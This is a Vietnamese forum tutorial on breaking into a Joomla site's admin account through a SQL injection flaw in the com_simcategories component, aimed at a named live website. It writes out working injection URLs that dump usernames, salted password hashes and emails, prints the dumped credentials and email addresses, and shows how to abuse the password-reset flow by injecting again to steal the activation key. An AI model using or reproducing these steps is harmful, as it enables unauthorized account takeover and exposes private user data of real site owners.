[TUT] Hướng dẫn đăng nhập Joomla khi bạn đã lấy được thông tin từ SQL Injection

Đầu tiên, tất nhiên là SQL Injection rồi  Để cho dễ, tớ xài vul trong com_simcategories (Xem bài:[Joomla] Com_simcategories dính lỗi sqli)

OK, giả sử victim là thằng này:

http://dienthoainamanh.com/index.php?option=com_simcategories&view=simcategories&id=4

Giờ thì chèn SQL injection thôi

http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,password,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-

Ta có gì nào:

asuamin|053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7|vanhuyenpc@gmail.com,namanh|7ecb6c26dc2422ab825817bf7d97d923:eT6gDqPs6c6rDcOHT9CVNK4wfzQoVGQp|dienthoai.namanh@gmail.com

Password và salt kiểu này crack tới mãn kiếp quá :’( 053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7

Giỡn thôi, giờ thì tìm trang reset password nha 

http://dienthoainamanh.com/index.php?option=com_user&view=reset

Điền vào email ở trên: vanhuyenpc@gmail.com và nhấn nút

Xong, lại tiếp tục sql injection. Mục đích là lấy activation key

http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,activation,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-

Điền cái activation vào khung => OK => nhập password mới và làm gì tiếp theo thì….xin hẹn bài sau ^^

Mình vô được rồi nè